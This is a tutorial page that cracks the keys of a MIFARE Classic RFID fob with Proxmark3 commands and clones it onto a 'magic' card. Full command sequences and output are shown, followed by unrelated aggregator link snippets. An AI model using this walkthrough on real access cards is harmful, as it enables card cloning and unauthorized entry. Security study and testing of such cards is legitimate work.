Nixawk
Nixawk

Exploit - RFID

RFID Hacking

  1. Prepare

    • Install Proxmark3
    • Check Proxmark3 / card status

  2. Crack Keys

    • PRNG Attack
    • NESTED Attack
  3. Dump data & Write data

Prepare

Install Proxmark3

$ sudo apt-get install git build-essential libreadline5 libreadline-dev gcc-arm-none-eabi libusb-0.1-4 libusb-dev libqt4-dev ncurses-dev perl pkg-config
$ git clone https://github.com/Proxmark/proxmark3.git
$ cd proxmark3
$ make clean && make

Check Proxmark3 / card status

Show version information about the connected Proxmark.

proxmark3> hw version
[[[ Cached information ]]]

Prox/RFID mark3 RFID instrument

uC: AT91SAM7S256 Rev C
Embedded Processor: ARM7TDMI
Nonvolatile Program Memory Size: 256K bytes. Used: 0 bytes ( 0%). Free: 262144 bytes (100%).
Second Nonvolatile Program Memory Size: None
Internal SRAM Size: 64K bytes
Architecture Identifier: AT91SAM7Sxx Series
Nonvolatile Program Memory Type: Embedded Flash Memory
proxmark3> hw tune

Measuring antenna characteristics, please wait........
# LF antenna: 30.39 V @   125.00 kHz
# LF antenna: 32.45 V @   134.00 kHz
# LF optimal: 37.40 V @   129.03 kHz
# HF antenna: 18.54 V @    13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.

Crack Keys

Act like an ISO14443 Type A reader

proxmark3> hf 14a reader
 UID : f3 34 9b ce
ATQA : 00 04
 SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
Answers to chinese magic backdoor commands: NO

Read parity error messages. The next step is to extract at least one valid sector key (A or B ). The implementation of the darkside attack in this firmware version of the proxmark only takes about 9 seconds to complete. In this case the key that was found is one of the default keys but that does not affect the speed of the attack.

PRNG Attack

proxmark3> hf mf mifare
-------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average
Press button on the proxmark3 device to abort both proxmark3 and client.
-------------------------------------------------------------------------
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
Parity is all zero. Most likely this card sends NACK on every failed authentication.
Attack will take a few seconds longer because we need two consecutive successful runs.
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
Found 2 possible keys. Trying to authenticate with each of them ...

Found valid key:ffffffffffff

Test nested authentication. Once we have at least one valid key we can use that key to run a nested attack on all 16 sectors. In this case the fact that 0xffffffffffff is one of the default speeds the process up considerably (about 30 seconds). From tests using cards with fully random keys for all 16 sectors it takes the promark approximately 8 minutes fo find them all. The results here are writen to dumpkeys.bin.

Nested Attack

proxmark3> hf mf nested 1 0 A ffffffffffff d
Testing known keys. Sector count=16
nested...
Time in nested: 4.820 (inf sec per key)

-----------------------------------------------
Iterations count: 0


|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|001|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|003|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|015|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|---|----------------|---|----------------|---|
Printing keys to binary file dumpkeys.bin...

Dump data & Write data

As a final step in our initial discovery with the proxmark we will dump the full card contents. This will require dumpkeys.bin to exist in the parent directory so make sure to include the “d” flags in the command above. The results will be written to dumpdata.bin.

proxmark3> hf mf dump
|-----------------------------------------|
|------ Reading sector access bits...-----|
|-----------------------------------------|
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
|-----------------------------------------|
|----- Dumping all blocks to file... -----|
|-----------------------------------------|
#db# READ BLOCK FINISHED
Successfully read block  0 of sector  0.
#db# READ BLOCK FINISHED
Successfully read block  1 of sector  0.
#db# READ BLOCK FINISHED
Successfully read block  2 of sector  0.
#db# READ BLOCK FINISHED
Successfully read block  3 of sector  0.
#db# READ BLOCK FINISHED
Successfully read block  0 of sector  1.
#db# READ BLOCK FINISHED
Successfully read block  1 of sector  1.
#db# READ BLOCK FINISHED
Successfully read block  2 of sector  1.
#db# READ BLOCK FINISHED
Successfully read block  3 of sector  1.
#db# READ BLOCK FINISHED
Successfully read block  0 of sector  2.
#db# READ BLOCK FINISHED
Successfully read block  1 of sector  2.
#db# READ BLOCK FINISHED
Successfully read block  2 of sector  2.
#db# READ BLOCK FINISHED
Successfully read block  3 of sector  2.
#db# READ BLOCK FINISHED
Successfully read block  0 of sector  3.
#db# READ BLOCK FINISHED
Successfully read block  1 of sector  3.
#db# READ BLOCK FINISHED
Successfully read block  2 of sector  3.
#db# READ BLOCK FINISHED
Successfully read block  3 of sector  3.
#db# READ BLOCK FINISHED
Successfully read block  0 of sector  4.
#db# READ BLOCK FINISHED
Successfully read block  1 of sector  4.
#db# READ BLOCK FINISHED
Successfully read block  2 of sector  4.
#db# READ BLOCK FINISHED
Successfully read block  3 of sector  4.
#db# READ BLOCK FINISHED
Successfully read block  0 of sector  5.
#db# READ BLOCK FINISHED
Successfully read block  1 of sector  5.
#db# READ BLOCK FINISHED
Successfully read block  2 of sector  5.
#db# READ BLOCK FINISHED
Successfully read block  3 of sector  5.
#db# READ BLOCK FINISHED
Successfully read block  0 of sector  6.
#db# READ BLOCK FINISHED
Successfully read block  1 of sector  6.
#db# READ BLOCK FINISHED
Successfully read block  2 of sector  6.
#db# READ BLOCK FINISHED
Successfully read block  3 of sector  6.
#db# READ BLOCK FINISHED
Successfully read block  0 of sector  7.
#db# READ BLOCK FINISHED
Successfully read block  1 of sector  7.
#db# READ BLOCK FINISHED
Successfully read block  2 of sector  7.
#db# READ BLOCK FINISHED
Successfully read block  3 of sector  7.
#db# READ BLOCK FINISHED
Successfully read block  0 of sector  8.
#db# READ BLOCK FINISHED
Successfully read block  1 of sector  8.
#db# READ BLOCK FINISHED
Successfully read block  2 of sector  8.
#db# READ BLOCK FINISHED
Successfully read block  3 of sector  8.
#db# READ BLOCK FINISHED
Successfully read block  0 of sector  9.
#db# READ BLOCK FINISHED
Successfully read block  1 of sector  9.
#db# READ BLOCK FINISHED
Successfully read block  2 of sector  9.
#db# READ BLOCK FINISHED
Successfully read block  3 of sector  9.
#db# READ BLOCK FINISHED
Successfully read block  0 of sector 10.
#db# READ BLOCK FINISHED
Successfully read block  1 of sector 10.
#db# READ BLOCK FINISHED
Successfully read block  2 of sector 10.
#db# READ BLOCK FINISHED
Successfully read block  3 of sector 10.
#db# READ BLOCK FINISHED
Successfully read block  0 of sector 11.
#db# READ BLOCK FINISHED
Successfully read block  1 of sector 11.
#db# READ BLOCK FINISHED
Successfully read block  2 of sector 11.
#db# READ BLOCK FINISHED
Successfully read block  3 of sector 11.
#db# READ BLOCK FINISHED
Successfully read block  0 of sector 12.
#db# READ BLOCK FINISHED
Successfully read block  1 of sector 12.
#db# READ BLOCK FINISHED
Successfully read block  2 of sector 12.
#db# READ BLOCK FINISHED
Successfully read block  3 of sector 12.
#db# READ BLOCK FINISHED
Successfully read block  0 of sector 13.
#db# READ BLOCK FINISHED
Successfully read block  1 of sector 13.
#db# READ BLOCK FINISHED
Successfully read block  2 of sector 13.
#db# READ BLOCK FINISHED
Successfully read block  3 of sector 13.
#db# READ BLOCK FINISHED
Successfully read block  0 of sector 14.
#db# READ BLOCK FINISHED
Successfully read block  1 of sector 14.
#db# READ BLOCK FINISHED
Successfully read block  2 of sector 14.
#db# READ BLOCK FINISHED
Successfully read block  3 of sector 14.
#db# READ BLOCK FINISHED
Successfully read block  0 of sector 15.
#db# READ BLOCK FINISHED
Successfully read block  1 of sector 15.
#db# READ BLOCK FINISHED
Successfully read block  2 of sector 15.
#db# READ BLOCK FINISHED
Successfully read block  3 of sector 15.
Dumped 64 blocks (1024 bytes) to file dumpdata.bin
proxmark3> script run dumptoemul.lua
--- Executing: dumptoemul.lua, args ''
Wrote an emulator-dump to the file F3349BCE.eml

-----Finished

As explained previously 99.999% of all Miface cards have block0(sector0) locked at manufacturing time, this is done as a security precaution. Because of this many Miface systems identify their users by their NUID. Unfortunately (for fortunately depending on your point of view) this is not a technical limitation and there is a Chinese manufacturer that sells Mifare cards with unlocked write access on block0. These so called “Magic” cards even take things a step further and have implemented protocol level backdoors that allow us to write to individual blocks or sectors without needing to authenticate with the respective sector keys.

root@sh:~/proxmark3# ./client/proxmark3 /dev/ttyACM0
#db# Prox/RFID mark3 RFID instrument
#db# bootrom: /-suspect 2015-04-02 15:12:04
#db# os: /-suspect 2015-04-02 15:12:11
#db# HF FPGA image built on 2015/03/09 at 08:41:42
Prox/RFID mark3 RFID instrument

uC: AT91SAM7S256 Rev C
Embedded Processor: ARM7TDMI
Nonvolatile Program Memory Size: 256K bytes. Used: 0 bytes ( 0%). Free: 262144 bytes (100%).
Second Nonvolatile Program Memory Size: None
Internal SRAM Size: 64K bytes
Architecture Identifier: AT91SAM7Sxx Series
Nonvolatile Program Memory Type: Embedded Flash Memory

If we try to identify the card we can see the manufacture data is different than the key-chain fob but other than that they are pretty much identicak.

proxmark3> hf 14a reader
 UID : c9 51 27 10
ATQA : 00 04
 SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
Answers to chinese magic backdoor commands: YES

As we can see we can simple dump sector0 without any authentication. 

proxmark3> hf mf cgetblk 0
--block number: 0
block data:c9 51 27 10 af 08 04 00 12 13 14 15 16 17 18 19

Just to show that we can manually modify block0 I will replace N bytes with .

proxmark3> hf mf csetblk 0 f3349bce9208040001c15bddf9db011d
proxmark3> hf mf cgetblk 0
--block number: 0
block data:c9 51 27 10 af 08 04 00 12 13 14 15 16 17 18 19

The proxmark is also capable of emulating various card types. The proxmark can load contents from special *.eml files and them mimic those cards using the eml file contents. One of the nice feature of the Chinese “magic” cars is that you can overwrite the entire card using these same eml files.

Basically eml files are just cleaned up hex dumps of car data. You can do this manually but I have zipped up a few useful promark script here.

Once we have our eml file we can proceed to overwrite our “magic” card with the contents of our key-chain essentially making a prefect copy.

proxmark3> hf mf cload F3349BCE
#db# write block send command error
Can't set magic card block: 25
proxmark3> hf mf cload F3349BCE
Loaded from file: F3349BCE.eml
proxmark3> hf mf cgetblk 0
--block number: 0
block data:f3 34 9b ce 92 08 04 00 01 c1 5b dd f9 db 01 1d

References

  1. https://github.com/Proxmark/proxmark3/wiki/Kali-Linux
  2. http://www.fuzzysecurity.com/tutorials/rfid/3.html
  3. http://www.freebuf.com/articles/wireless/109151.html

你可能感兴趣的:(exploit)

  • 国内网站安全测试6大步骤 红酒味蛋糕_ 网络安全
    网站安全测试目标:1.发现网络系统中存在的安全隐患和可能被入侵者利用的安全漏洞2.与黑客区别:·渗透测试是经过授权的·可控制的、非破坏性的方法3.宏观上的分类:·黑盒测试不了解目标详细信息的情况,模拟黑客攻击.·白盒测试完全了解,代码审计.·灰盒测试了解一部分东西.4.思路和细节名词解释漏洞POC验证漏洞存在的代码片段exploit利用(渗透攻击)exp(利用一个漏洞完整的程序)提权权限提升获取当
  • Exploiting server-side parameter pollution in a query string Zkaisen Burpsuitburpsuitweb安全
    Target:loginastheadministratoranddeletecarlos.1、防止API漏洞在设计API时,确保在一开始就考虑到安全性要确保:保护API文档如果你的API文档不打算公开的话确保文档及时更新以便于合法的测试者能够充分进行API攻击面测试设置HTTP方法的允许列表验证每个请求或响应所期望的内容类型使用通用错误消息来避免泄露可能对攻击者有用的信息。对API的所有版本使用
  • 网络安全:kali之MSF工具基本使用方法 诺卡先生 网络安全学习笔记网络安全linux安全服务器linux
    1、进入MSF工具:nsfconsole2、查询漏洞利用工具:search漏洞编号3、打开工具:use工具id4、查看工具配置参数:showoptions5、查看工具的详细信息:info6、配置参数:set参数头目标主机set参数头目标端口(参数配置根据实际所缺参数为准)7、运行工具:run或者exploit@返回命令:back@新版kali已经自动配置Payload;不需要再次自己配置(当然也可
  • 介绍5大黑客技术网站,一个就能让你成为黑客 编程瞬息全宇宙 安全web安全php网络数据库
    5大优秀黑客必逛技术网站HackForums最理想的黑客技术学习技术根据地,也适用于开发人员游戏开发者,程序员,图形设计师以及网络营销人士HackThisSite提供合法而安全的网络安全资源,可以通过·各类挑战题目测试自己的黑客技能EnilZone一个专门面向黑科群体的论坛,其中也涉及科学,编程以及艺术等领域的内容Exploit-DB提供一整套庞大的归档体系,公开的攻击事件,漏洞报告,技术教程等资
  • 托福写作的十三个万能理由 考培侠kpx
    [if!supportLists]一.[endif]成就感(achievement)关键词句:asenseofachievementvirtuouscycle良性循环grandfeat/exploit辉煌的业绩attainmentofgoalselevateourself-esteembeconductivetoself-actualization有助于自我实现万能段落:Bydoing(somet
  • tee漏洞学习-翻译-3:TrustZone exploit for MSM8974 goodcat666 tee安全teepwn
    原文:http://bits-please.blogspot.com/2015/08/full-trustzone-exploit-for-msm8974.html在这篇博文中,我们将介绍利用上一篇文章中描述的TrustZone漏洞的完整过程。在开发此漏洞时,我只使用了我值得信赖的(个人)Nexus5设备。这意味着下面写入的所有内存地址和其他特定信息均取自该设备。如果有人想要重新创建下面描述的确切
  • 恶意代码分析实战 第十一章 恶意代码的行为 doinb1517
    本章主要熟悉恶意代码的行为。下载器和启动器常见的两种恶意代码是下载器和启动器。下载器从互联网上下载其他的恶意代码,然后在本地系统中运行。下载器通常会与漏洞利用(exploit)打包在一起。下载器常用WindowsAPI函数URLDownloadtoFileA和WinExec,来下载并运行新的恶意代码。启动器(也称为加载器)是一类可执行文件,用来安装立即运行或者将来秘密执行的恶意代码。启动器通常包含
  • 白帽子学习——Metasploit渗透测试指南 yeapT 渗透测试安全服务器网络
    根据pdf,总结自己认为比较重要的,欢迎大佬指错。1.Metasploit基础1.1专业术语1.1.1渗透攻击(Exploit)由攻击者或渗透测试者利用一个系统、应用或服务中心的安全漏洞进行的攻击行为。往往会造成开发者所没有预期到的一种特殊结果。1.1.2攻击载荷(Payload)目标系统在被渗透攻击之后去执行的代码,在Metasploit框架中可以自由地选择、传送和植入。1.1.3Shellco
  • 新型Black Matter勒索病毒,勒索300万美金 Promise承诺 安全网络服务器
    专注于全球恶意软件的分析与研究BlackMatter勒索病毒是一款基于RAAS模式的新型勒索病毒,该勒索病毒组织成立于2021年7月,该勒索病毒黑客组织对外宣称,已经整合了DarkSide、REvil和LockBit等勒索病毒的最佳功能特点。勒索病毒黑客组织曾表示不会对医疗保健、关键基础设施、石油和天然气、国防、非营利组织和政府进行攻击,该勒索病毒初期通过Exploit和XSS等黑客论坛进行宣传和
  • 【深蓝学院】移动机器人运动规划--第3章 基于采样的路径规划--笔记 读书健身敲代码 motionplanning笔记Roboticsmotionplanning
    0.Preliminaries做规划都是将WS转到Cspace下进行。找到可行解和最优解(这两个不同)通过增量或者批次地在C-space中采样来增量式地构建树或者图。不显式地构造如果把整个规划问题看成一个大的优化问题,那么大问题可以拆分成小问题进行求解。整个规划问题可以分为两个基本的tasks:Explotration和ExploitationExplotration目的是获取搜索空间中的拓扑信息
  • 红队系列-网络安全知识锦囊 amingMM 网络安全-渗透测试web安全安全
    网络安全免责声明法律科普学习资源网站靶场/CTF大佬博客笔记思维框图CTF/AWDAPT&&矩阵Web安全/渗透测试ToolsGolang工具FscanGolang工具ChYing信息收集注入攻击ToolsJNDIExploit反序列化ToolsYsoserial权限提升内网横向代理EWNPSproxychainsrakshasareGeorg权限ActiveDirectory域渗透CrackMa
  • 揭秘家用路由器0day漏洞挖掘技术原始环境搭建 此人亦非 二进制漏洞路由器固件固件分析Ubuntu12
    对于未知的复杂事物,应该先去跟谁它,观察它,然后挖掘其规律。《揭秘家用路由器0day漏洞挖掘技术》出版于2015年,使用的系统环境为ubuntu-12.04.4-desktop-i386(ubuntu1232bit桌面版)。里面涉及的dir-645,dir-815等的溢出漏洞,在exploit-db上的时间为2013年前段,距离当前(2019)已经6年多了。作者当初使用相关的软件和系统距今发生很多
  • shellcode Lyx-0607 笔记
    生成shellcode在漏洞利用中,shellcode是不可或缺的部分,所以在网上有许多公开分享的shellcode,在不同平台上并不通用,需要选择适合的shellcode。这里推荐两个常见公开的安全平台:一个为公开的漏洞库exploit-db(见公众号链接10-1),一个为公开的Shell-strom库(见公众号链接10-2),如图10-1和图10-2所示。图10-1exploit-db公开漏洞
  • 商务英语中,verbal 和 psychological是什么意思? Lisa_Wang_China
    WeexpectourBusinessAssociatestocreateandmaintainanenvironmentthattreatsallemployeeswithdignityandrespect,andwillnotuseanythreatsofviolence,sexualexploitationorabuse,verbalorpsychologicalharassmentorab
  • 新型Black Matter勒索病毒,勒索300万美金 熊猫正正 勒索病毒专题报告勒索病毒系统安全安全威胁分析网络安全
    前言BlackMatter勒索病毒是一款基于RAAS模式的新型勒索病毒,该勒索病毒组织成立于2021年7月,该勒索病毒黑客组织对外宣称,已经整合了DarkSide、REvil和LockBit等勒索病毒的最佳功能特点。勒索病毒黑客组织曾表示不会对医疗保健、关键基础设施、石油和天然气、国防、非营利组织和政府进行攻击,该勒索病毒初期通过Exploit和XSS等黑客论坛进行宣传和招募合作伙伴及会员,Bla
  • web渗透入门 baidu_36461925 应用层安全sql注入xpath
    目录工具...2攻击类型...2SQL注入...2Exploit网站及工具...3预防SQL注入...13攻击类型...15跨站点请求伪造...19缓存投毒...20代码注入...21注释注入...23Xpath注入...25XSS.27目录遍历...29爆路径...31跨用户攻击...32会话固定攻击...33PHP对象攻击...34HTTP请求走私...36HTTP响应拆分...38工具Met
  • Log4j2漏洞(二)3种方式复现反弹shell 大象只为你 跟我学网安知识log4j漏洞复现网络安全命令执行
    ★★免责声明★★文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。1、前言明天就是除夕了,提前祝大家:新年新气象,龙年龖龖!也祝愿自己2024年一切顺利!本文主要是分享log4j2反弹shell的3种方式,第一种方式【JNDI-Injection-Exploit】对jdk版本要求比较高,因此我在靶场
  • 渗透测试常用术语总结 沫风港 web安全安全
    渗透测试常用术语总结题记人的一生会遇到两个人,一个惊艳了时光,一个温柔了岁月。——苏剧《经年》正文我是会把我遇到很晦涩或者难以理解的词语分享到这的。相信大家和我一样,搞不清这些专业名词的区别,所以我来整理一下。1.POC、EXP、Payload与ShellcodePOC:全称'ProofofConcept',中文'概念验证',常指一段漏洞证明的代码。EXP:全称'Exploit',中文'利用',指
  • 小白的第二篇LeetCode(国际版)英文题解 - Problem. 49 春玩其华,秋得其实 Leetcode刷题leetcode算法python
    Python||ExtremelySHORT(5lines!)&EASY||FullyexploitPythonGroupAnagrams-LeetCodeLevelupyourcodingskillsandquicklylandajob.Thisisthebestplacetoexpandyourknowledgeandgetpreparedforyournextinterview.https:
  • 2023 年已知被利用最多的十大CWE漏洞排名 华为云PaaS服务小智 安全网络web安全
    作者:Uncle_Tom原文链接:2023年已知被利用最多的十大CWE漏洞排名-云社区-华为云1.2023年已知被利用最多的十大CWE漏洞排名2023年12月14日,CWE的网站上公布了美国网络安全和基础设施安全局(Cybersecurity&InfrastructureSecurityAgency(CISA),简称CISA),管理的“已知被利用漏洞目录(KnownExploitedVulnera
  • 二进制安全虚拟机Protostar靶场(8)heap3 Fastbins unlink exploit Ba1_Ma0 pwn二进制安全笔记安全pwnctf二进制安全
    前言这是一个系列文章,之前已经介绍过一些二进制安全的基础知识,这里就不过多重复提及,不熟悉的同学可以去看看我之前写的文章heap3程序静态分析https://exploit.education/protostar/heap-three/#include#include#include#include#includevoidwinner()#定义了一个名为winner的函数{printf("that
  • 二进制安全虚拟机Protostar靶场(7)heap2 UAF(use-after-free)漏洞 Ba1_Ma0 二进制安全笔记pwn安全linuxctf二进制安全pwn
    前言这是一个系列文章,之前已经介绍过一些二进制安全的基础知识,这里就不过多重复提及,不熟悉的同学可以去看看我之前写的文章heap2程序静态分析https://exploit.education/protostar/heap-two/#include#include#include#include#includestructauth{#定义了一个名为auth的结构体charname[32];#定义了
  • 【Web】CVE-2021-22448 Log4j RCE漏洞学习 Z3r4y javalog4jCVECVE-2021-22448RCE网络安全
    目录复现流程漏洞原理复现流程启动HTTP->启动LDAP->执行Log4jvps起个http服务,放好Exploit.class这个恶意字节码LDAPRefServer作为恶意LDAP服务器importjava.net.InetAddress;importjava.net.MalformedURLException;importjava.net.URL;importjavax.net.Server
  • Browser Fingerprinting: Unveiling the Unique Identifier of Web Browsers 进击切图仔 前端
    Browserfingerprintingisatechnologyusedtoidentifyandlabelwebbrowsersbyexploitingtheuniquecharacteristicstheyexhibitwhenusersaccesswebsites.Itleveragesthedistinctfeaturesdisplayedbybrowsersduringuserint
  • pwn学习笔记(1) 晓幂 学习笔记
    pwn学习笔记(1)(1)pwn简介:以下来自于百度百科:”Pwn”是一个黑客语法的俚语词,是指攻破设备或者系统发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵了。(2)几个简单的名词:exploit:用于攻击的脚本与方案payload:攻击载荷,是对目标进程劫持控制流的数据shellcode:调用攻击目标的shell代码,常见的有bash和sh
  • MSF手工导入模块小记 涛__涛
    首先是msf模块所在的路径root@kali:~#cd/usr/share/metasploit-framework/modules/root@kali:/usr/share/metasploit-framework/modules#lsauxiliaryencodersevasionexploitsnopspayloadspost假如要导入exp模块root@kali:/usr/share/me
  • kail使用msf工具利用永恒之蓝漏洞攻击win7 只喜欢打乒乓球 安全
    实验环境靶机:win7IP:192.168.43.144攻击机:kaliip:192.168.43.150实验开始:第一步:打开msfconsole进入到工具里面搜索一下永恒之蓝漏洞searchms17_010这上面有三个可以利用的漏洞我们选择第一个useexploit/windows/smb/ms17_010_eternalblue接下来我们可以查看需要设置的IP地址和端口showoptions
  • 适配器模式的三种实现 乔布 java适配器模式java开发语言
    1.接口适配器模式,借助中间抽象类空实现目标接口所有方法,子类选择性重写,可以减少实现不必要方法先写一个接口,里面有三种方法publicinterfaceTeam{voidexploitation();//开发voidtest();//测试voidproducts();//产品}写一个实现类,实现这个接口publicclassAbstractAdapterimplementsTeam{@Overr
  • 收集常用端口信息 QiWi
    文件共享端口PortInfoExploit21/22/69Ftp/Tftp文件传输协议允许匿名的上传、下载、爆破和嗅探操作2049Nfs服务配置不当139Samba服务爆破、未授权访问、远程代码执行389Ldap目录访问协议注入、允许匿名访问、弱口令远程连接端口PortInfoExploit22SSH远程连接爆破、ssh隧道及内网代理转发、文件传输23Telnet远程连接爆破、弱口令、嗅探3389
  • 红日靶场之sta&&ck远程桌面控制 个人学习) 曼达洛战士 学习
    我们首先打开webshell工具然后切换到C盘的www的文件夹下面然后我们打开MSF工具进行监听模板msfconsole启动MSF工具然后是useexploit/multi/handler使用漏洞辅助模块setpayloadwindows/meterpreter/reverse_tcp这是利用漏洞tcp回弹模块setlhost192.168.52.129这是设置回弹的主机这里是我们的kali攻击机
  • Spring中@Value注解,需要注意的地方 无量 springbean@Valuexml
    Spring 3以后,支持@Value注解的方式获取properties文件中的配置值,简化了读取配置文件的复杂操作 1、在applicationContext.xml文件(或引用文件中)中配置properties文件 <bean id="appProperty" class="org.springframework.beans.fac
  • mongoDB 分片 开窍的石头 mongodb
        mongoDB的分片。要mongos查询数据时候 先查询configsvr看数据在那台shard上,configsvr上边放的是metar信息,指的是那条数据在那个片上。由此可以看出mongo在做分片的时候咱们至少要有一个configsvr,和两个以上的shard(片)信息。     第一步启动两台以上的mongo服务 &nb
  • OVER(PARTITION BY)函数用法 0624chenhong oracle
    这篇写得很好,引自 http://www.cnblogs.com/lanzi/archive/2010/10/26/1861338.html OVER(PARTITION BY)函数用法 2010年10月26日 OVER(PARTITION BY)函数介绍 开窗函数        &nb
  • Android开发中,ADB server didn't ACK 解决方法 一炮送你回车库 Android开发
    首先通知:凡是安装360、豌豆荚、腾讯管家的全部卸载,然后再尝试。   一直没搞明白这个问题咋出现的,但今天看到一个方法,搞定了!原来是豌豆荚占用了 5037 端口导致。 参见原文章:一个豌豆荚引发的血案——关于ADB server didn't ACK的问题 简单来讲,首先将Windows任务进程中的豌豆荚干掉,如果还是不行,再继续按下列步骤排查。 &nb
  • canvas中的像素绘制问题 换个号韩国红果果 JavaScriptcanvas
    pixl的绘制,1.如果绘制点正处于相邻像素交叉线,绘制x像素的线宽,则从交叉线分别向前向后绘制x/2个像素,如果x/2是整数,则刚好填满x个像素,如果是小数,则先把整数格填满,再去绘制剩下的小数部分,绘制时,是将小数部分的颜色用来除以一个像素的宽度,颜色会变淡。所以要用整数坐标来画的话(即绘制点正处于相邻像素交叉线时),线宽必须是2的整数倍。否则会出现不饱满的像素。 2.如果绘制点为一个像素的
  • 编码乱码问题 灵静志远 javajvmjsp编码
    1、JVM中单个字符占用的字节长度跟编码方式有关,而默认编码方式又跟平台是一一对应的或说平台决定了默认字符编码方式;2、对于单个字符:ISO-8859-1单字节编码,GBK双字节编码,UTF-8三字节编码;因此中文平台(中文平台默认字符集编码GBK)下一个中文字符占2个字节,而英文平台(英文平台默认字符集编码Cp1252(类似于ISO-8859-1))。 3、getBytes()、getByte
  • java 求几个月后的日期 darkranger calendargetinstance
    Date plandate = planDate.toDate(); SimpleDateFormat df = new SimpleDateFormat("yyyy-MM-dd"); Calendar cal = Calendar.getInstance(); cal.setTime(plandate); // 取得三个月后时间 cal.add(Calendar.M
  • 数据库设计的三大范式(通俗易懂) aijuans 数据库复习
    关系数据库中的关系必须满足一定的要求。满足不同程度要求的为不同范式。数据库的设计范式是数据库设计所需要满足的规范。只有理解数据库的设计范式,才能设计出高效率、优雅的数据库,否则可能会设计出错误的数据库. 目前,主要有六种范式:第一范式、第二范式、第三范式、BC范式、第四范式和第五范式。满足最低要求的叫第一范式,简称1NF。在第一范式基础上进一步满足一些要求的为第二范式,简称2NF。其余依此类推。
  • 想学工作流怎么入手 atongyeye jbpm
    工作流在工作中变得越来越重要,很多朋友想学工作流却不知如何入手。 很多朋友习惯性的这看一点,那了解一点,既不系统,也容易半途而废。好比学武功,最好的办法是有一本武功秘籍。研究明白,则犹如打通任督二脉。 系统学习工作流,很重要的一本书《JBPM工作流开发指南》。 本人苦苦学习两个月,基本上可以解决大部分流程问题。整理一下学习思路,有兴趣的朋友可以参考下。 1  首先要
  • Context和SQLiteOpenHelper创建数据库 百合不是茶 androidContext创建数据库
           一直以为安卓数据库的创建就是使用SQLiteOpenHelper创建,但是最近在android的一本书上看到了Context也可以创建数据库,下面我们一起分析这两种方式创建数据库的方式和区别,重点在SQLiteOpenHelper     一:SQLiteOpenHelper创建数据库:   1,SQLi
  • 浅谈group by和distinct bijian1013 oracle数据库group bydistinct
            group by和distinct只了去重意义一样,但是group by应用范围更广泛些,如分组汇总或者从聚合函数里筛选数据等。         譬如:统计每id数并且只显示数大于3 select id ,count(id) from ta
  • vi opertion 征客丶 macoprationvi
    进入 command mode (命令行模式) 按 esc 键 再按 shift + 冒号 注:以下命令中 带 $ 【在命令行模式下进行】,不带 $ 【在非命令行模式下进行】 一、文件操作 1.1、强制退出不保存 $ q! 1.2、保存 $ w 1.3、保存并退出 $ wq 1.4、刷新或重新加载已打开的文件 $ e 二、光标移动 2.1、跳到指定行 数字
  • 【Spark十四】深入Spark RDD第三部分RDD基本API bit1129 spark
      对于K/V类型的RDD,如下操作是什么含义?   val rdd = sc.parallelize(List(("A",3),("C",6),("A",1),("B",5)) rdd.reduceByKey(_+_).collect  reduceByKey在这里的操作,是把
  • java类加载机制 BlueSkator java虚拟机
